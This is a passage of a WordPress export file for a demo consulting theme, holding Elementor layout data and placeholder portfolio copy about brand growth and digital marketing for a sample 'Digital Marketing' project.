Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"07bd111","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"6681d53","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f21d852","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"ccf178b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"0b876a6","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9ac5aeb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"29f27b7","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"21a93d2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fcefffe","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"7fca8b4","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"c237768","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2673ab3","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"889a76d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2b867b0","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b7322e2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9a62480","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"01bdb25","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/</link>
		<pubDate>Fri, 11 Sep 2020 07:16:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=837</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>August 14, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>837</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:16:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:16:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[838]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[839]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3be3337c","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"5befbf60","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ce70032","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3f822f27","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"68851ebc","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"250ea23d","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"71c341e4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6542827e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"371f6bc3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1eb0ca9d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"71f04c6a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3d3344ee","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"832149d","elType":"widget","settings":{"editor":"<p>August 14, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5342643c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6f721437","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2f3d08dd","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"6b706da","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63060966","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"75e4e9b8","elType":"section","settings":[],"elements":[{"id":"6bda05f8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"52f0b92f","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"54d9052f","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3b65fe94","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7545e3c5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"605dfd7a","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2518391b","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"633f728b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4070ca87","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f1792de","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7cf09702","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"27507c6a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6c19f0d0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4db11d58","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4723e5a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7844df75","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d819e34","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"414945e5","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"58ded439","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"3c1686f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"77c59310","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in 